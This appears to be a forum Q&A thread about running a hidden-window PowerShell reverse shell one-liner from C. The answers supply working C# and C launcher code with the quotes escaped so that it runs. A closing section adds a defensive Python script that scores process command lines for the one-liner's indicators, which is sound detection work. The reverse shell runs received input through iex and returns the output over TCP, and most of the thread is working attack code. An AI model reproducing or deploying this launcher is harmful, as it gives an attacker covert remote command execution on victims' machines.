How do I run this one-line PowerShell reverse shell from C?



When I put the PowerShell one-liner into system(""); and try to execute it as a system command, C does not understand it.

PowerShell reverse shell:

powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

When I put this rev-shell into Python using the subprocess module, specifying it as subprocess.call(''' '''), it works fine.

Help me use this rev shell in C:

I'm not 100% sure, but a while ago I had a similar problem dropping a PowerShell script from C#. Maybe something similar works in C too. C# code:

var startInfo = new ProcessStartInfo()
{
FileName = "powershell.exe",
// Plain string literal: a $"..." interpolated string would treat {0} and {;...} as format items.
// Every " inside the PowerShell command is escaped as \" for the C# string.
Arguments = "-W Hidden -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
UseShellExecute = false
};
Process.Start(startInfo);

Just putting the PowerShell into system(""); is not enough: you have to escape each embedded " with \:

system("powershell -W Hidden -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$send`enter code here`back2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");

You should look over that command: you probably don't want enter code here in it.
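From the defender's side, the one-liner discussed in this thread has a recognisable shape in process-creation logs (hidden window, no profile, a TCPClient, GetStream and iex in one command line). The following is an added example, not code from the question or either answer, that scores command lines for that combination; the log lines and the weights are constructed for illustration.

```python
import re

# Constructed sample process-creation command lines (not from any real log).
SAMPLE_COMMAND_LINES = [
    'powershell -W Hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\'127.0.0.1\',4242);'
    '$stream = $client.GetStream();...iex $data..."',
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users"',
    'powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
]

# Indicator patterns with assumed weights. Any one of them is common in admin
# use; several together in a single command line is the shape of the one-liner.
INDICATORS = {
    "hidden_window": (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    "no_profile": (re.compile(r"-no(p|profile)\b", re.I), 1),
    "tcp_client": (re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 3),
    "invoke_expression": (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 2),
    "stream_io": (re.compile(r"\.GetStream\(\)", re.I), 2),
}


def is_powershell_launch(cmd):
    """True if the command line starts a powershell / powershell.exe process."""
    return re.search(r"(^|[\\\s\"'])powershell(\.exe)?\b", cmd, re.I) is not None


def score_command_line(cmd):
    """Return (score, matched indicator names) for one command line."""
    hits = [name for name, (pat, _) in INDICATORS.items() if pat.search(cmd)]
    score = sum(INDICATORS[name][1] for name in hits)
    return score, hits


def find_suspicious(lines, threshold=5):
    """Return [(line, score, hits)] for PowerShell launches at or above threshold."""
    flagged = []
    for line in lines:
        if not is_powershell_launch(line):
            continue
        score, hits = score_command_line(line)
        if score >= threshold:
            flagged.append((line, score, hits))
    return flagged


if __name__ == "__main__":
    for line, score, hits in find_suspicious(SAMPLE_COMMAND_LINES):
        print(score, hits, line[:60])
```

The threshold is deliberately above the weight of any single indicator, so ordinary -NoProfile or -WindowStyle Hidden administrative launches are not flagged on their own.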
